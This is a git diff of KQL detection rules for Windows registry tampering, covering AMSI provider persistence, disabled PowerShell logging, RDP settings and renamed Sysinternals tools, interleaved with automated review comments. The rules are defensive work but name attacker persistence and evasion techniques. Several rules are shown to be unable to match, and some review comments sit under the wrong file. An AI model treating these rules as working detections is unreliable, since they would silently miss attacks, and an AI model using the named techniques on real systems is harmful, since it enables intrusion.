diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql
new file mode 100644
index 00000000..5a6f60be
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via New AMSI Providers - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.
+// Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.
+// This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate security products adding their own AMSI providers. Filter these according to your environment.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*") and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe" and RegistryKey contains "\\{00000001-3DCC-4B48-A82E-E2071FE58E05}"))))
\ No newline at end of file
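Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*"` treats the trailing `*` as a literal character — KQL `endswith` has no wildcard support — so neither branch of the first clause can match a real provider key such as `...\AMSI\Providers\{CLSID}` and the rule never fires. This reads as a Sigma-to-KQL conversion artefact (a glob left inside an `endswith`) that the converter should translate into a prefix test. Suggest `| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers\\" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers\\") and ...` with the existing Avast/AVG/Avira exclusions kept unchanged. The same `endswith "...*"` pattern appears in other rules added by this commit, so fixing it in the converter rather than per file is worth considering.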
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_typedpaths.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql
rename to KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql
diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
rename to KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
diff --git a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql
rename to KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql
diff --git a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql
similarity index 100%
rename from KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql
rename to KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql
diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
rename to KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql
rename to KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql
diff --git a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
rename to KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql
diff --git a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql
rename to KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql
diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
similarity index 100%
rename from KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
rename to KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
rename to KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql
diff --git a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql
similarity index 100%
rename from KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql
rename to KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql
diff --git a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql b/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql
similarity index 100%
rename from KQL/rules/Execution/powershell_as_a_service_in_registry.kql
rename to KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql
diff --git a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql
similarity index 91%
rename from KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
rename to KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql
index 950e05a4..ff2eeb02 100644
--- a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
+++ b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql
@@ -4,7 +4,7 @@
// Level: high
// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001
+// Tags: attack.defense-evasion, attack.t1564.001, attack.t1112, attack.persistence
DeviceRegistryEvents
| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
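Review bot: The query under the changed Tags line can never return a row: it requires `RegistryKey` to end with `"\\Microsoft\\Windows\\PowerShell*"` (literal asterisk, `endswith` does not glob) and, in the same conjunction, with one of `\\ModuleLogging\\EnableModuleLogging` etc., and no single string satisfies two different `endswith` suffixes. The first group is meant as a path prefix and should read `(RegistryKey contains "\\Microsoft\\Windows\\PowerShell\\" or RegistryKey contains "\\Microsoft\\PowerShellCore\\")`. `EnableModuleLogging`, `EnableScriptBlockLogging` and the rest are registry value names; if `DeviceRegistryEvents` surfaces them in `RegistryValueName` rather than at the end of `RegistryKey`, the second group needs `RegistryValueName in~ ("EnableModuleLogging", "EnableScriptBlockLogging", ...)` — confirm against live events before relying on this rule. Adding `attack.persistence` while the `MITRE Tactic` header stays "Defense Evasion" also deserves a one-line justification or a matching header change.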
diff --git a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql b/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql
similarity index 100%
rename from KQL/rules/Execution/powershell_script_execution_policy_enabled.kql
rename to KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql
diff --git a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
similarity index 84%
rename from KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
rename to KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
index 16790602..5bc3bd52 100644
--- a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
+++ b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
@@ -10,4 +10,4 @@
// - Programs that use the same Registry Key
DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
+| where RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
similarity index 54%
rename from KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
rename to KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
index b69bf4bd..d0b04e6a 100644
--- a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
+++ b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
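Review bot: `RegistryKey endswith "\\EulaAccepted"` compares against the key path, but `EulaAccepted` is the value name a Sysinternals tool writes under its `HKCU\Software\Sysinternals\<Tool>` key; if `DeviceRegistryEvents` carries it in `RegistryValueName`, this predicate never matches and the rule is silently dead — please verify on a host that has just accepted a EULA. With the `ActionType` filter gone, value deletions also satisfy the predicate, which is not what "Sysinternals tool execution" means. Suggest `| where ActionType =~ "RegistryValueSet" and (RegistryValueName =~ "EulaAccepted" or RegistryKey endswith "\\EulaAccepted")` until the schema behaviour is confirmed.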
@@ -9,4 +9,4 @@
// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
+| where (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
rename to KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql
diff --git a/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql
new file mode 100644
index 00000000..13ad8c41
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql
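Review bot: The tool list is made redundant by its own last term: Sysinternals tools typically write their EULA key under `HKCU\Software\Sysinternals\<Tool>`, so `RegistryKey contains "\\Sysinternals"` subsumes the other nine `contains` terms and the rule reduces to the same predicate as the neighbouring `pua_sysinternal_tool_execution_registry` rule. If the intent is to flag only the listed tools, drop `or RegistryKey contains "\\Sysinternals"`; if it is to flag any tool, the whole parenthesised group can go. Either way the same schema caveat applies: `EulaAccepted` is a value name and may appear in `RegistryValueName` rather than at the end of `RegistryKey`, which should be checked before this rule is relied on.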
@@ -0,0 +1,22 @@
+// Title: RDP Sensitive Settings Changed
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-08-06
+// Level: high
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+// Below is a list of registry keys/values that are monitored by this rule:
+// - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
+// - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
+// - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
+// - fAllowUnsolicited: Allows unsolicited remote assistance offers.
+// - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
+// - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
+// - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
+// - SecurityLayer: Specifies the security layer used for RDP connections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where (((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")) and (not((RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SecurityLayer")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
rename to KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql
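Review bot: The first two branches of the `where` are dead code: `RegistryKey endswith "\\Control\\Terminal Server*"` keeps a literal `*` (KQL `endswith` does not glob) and is ANDed with `RegistryKey endswith "\\Shadow"` or the `fAllowUnsolicited`/`DisableSecuritySettings` group, and one string cannot end with two different suffixes, so every setting the header lists except `InitialProgram`, `ServiceDll` and `SecurityLayer` can never fire. Replace both prefix tests with `(RegistryKey contains "\\Control\\Terminal Server\\" or RegistryKey contains "\\Windows NT\\Terminal Services\\")`. `Shadow`, `fAllowUnsolicited`, `SecurityLayer` and friends are value names, which in `DeviceRegistryEvents` may be surfaced in `RegistryValueName` rather than appended to `RegistryKey`; the trailing `SecurityLayer == 2` exclusion has the same dependency, so confirm the column mapping on real events. The header also mentions `fDenyTSConnections` but the query never references it, so either the description or the predicate is incomplete.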
diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql
similarity index 100%
rename from KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
rename to KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql
diff --git a/KQL/rules/Impact/registry_disable_system_restore.kql b/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql
similarity index 100%
rename from KQL/rules/Impact/registry_disable_system_restore.kql
rename to KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql
diff --git a/KQL/rules/Persistence/registry_explorer_policy_modification.kql b/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql
similarity index 100%
rename from KQL/rules/Persistence/registry_explorer_policy_modification.kql
rename to KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql
diff --git a/KQL/rules/Persistence/registry_hide_function_from_user.kql b/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql
similarity index 100%
rename from KQL/rules/Persistence/registry_hide_function_from_user.kql
rename to KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql
diff --git a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql b/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql
similarity index 100%
rename from KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql
rename to KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql
diff --git a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql
rename to KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql
diff --git a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql
rename to KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql
similarity index 100%
rename from KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
rename to KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql
diff --git a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
similarity index 100%
rename from KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
rename to KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
diff --git a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql
rename to KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql
diff --git a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql b/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/screensaver_registry_key_set.kql
rename to KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql
diff --git a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql
rename to KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
similarity index 100%
rename from KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
rename to KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
diff --git a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql
similarity index 100%
rename from KQL/rules/Persistence/service_binary_in_suspicious_folder.kql
rename to KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql
diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql
similarity index 100%
rename from KQL/rules/Persistence/servicedll_hijack.kql
rename to KQL/rules/windows/registry/registry_set/servicedll_hijack.kql
diff --git a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql
rename to KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql
rename to KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
new file mode 100644
index 00000000..5d665765
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
@@ -0,0 +1,12 @@ +// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath 
endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql b/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql similarity index 100% rename from KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql rename to KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql rename to 